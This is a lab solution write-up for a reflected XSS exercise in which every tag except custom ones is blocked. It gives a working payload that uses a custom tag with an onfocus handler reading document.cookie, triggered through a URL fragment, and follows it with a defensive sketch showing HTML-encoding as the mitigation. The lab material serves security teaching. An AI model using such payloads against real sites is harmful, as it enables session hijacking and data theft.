Lab Solution: Reflected XSS into HTML context with all tags blocked except custom ones

In this lab, all tags are blocked except custom ones, so we have to create a new tag.

We will create a custom tag with the id “x” and an “onfocus” event handler that triggers the alert() function. Then we append a hash (#x) to the URL so that the browser focuses on this element when the page loads. The tabindex attribute gives the “x” element a place in the tab order, which makes it focusable.

<script>
location = 'https://lab-id.web-security-academy.net/?search=%3Cniek+id=x+onfocus=alert(document.cookie)+tabindex=1%3E#x';
</script>

Replace lab-id with the ID of your own lab instance.
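From the defender's side, the sketch below shows why a tag blocklist lets the custom tag through and how HTML-encoding the reflected value neutralizes it. It is an added example, not part of the original solution or the lab's code; `BLOCKED_TAGS`, `passesTagBlocklist`, `escapeHtml` and `decodeSearchParam` are hypothetical names, and the blocklist is an assumed stand-in for the lab's filter.

```javascript
// Hypothetical blocklist standing in for a filter that rejects known HTML tags.
const BLOCKED_TAGS = new Set(['script', 'img', 'svg', 'body', 'iframe', 'a', 'div', 'input']);

// Returns true when the blocklist filter would let the input through.
function passesTagBlocklist(input) {
  const tagPattern = /<\s*\/?\s*([a-zA-Z][^\s/>]*)/g;
  for (const match of input.matchAll(tagPattern)) {
    if (BLOCKED_TAGS.has(match[1].toLowerCase())) return false;
  }
  return true; // unknown (custom) tag names are never checked
}

// Mitigation: encode the value for the HTML body context before reflecting it.
function escapeHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(input).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Decode the search parameter as the server receives it (the #x fragment is not sent).
function decodeSearchParam(url) {
  return new URL(url).searchParams.get('search');
}

// The URL from the solution above, with the placeholder lab-id left as is.
const sampleUrl = 'https://lab-id.web-security-academy.net/?search=%3Cniek+id=x+onfocus=alert(document.cookie)+tabindex=1%3E#x';
const search = decodeSearchParam(sampleUrl);

console.log('decoded search value :', search);
console.log('passes tag blocklist :', passesTagBlocklist(search));
console.log('blocks <script>      :', !passesTagBlocklist('<script>1</script>'));
console.log('encoded for output   :', escapeHtml(search));
```

The encoded value is rendered as text, so no element with id “x” exists for the fragment to focus and the onfocus handler never runs.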
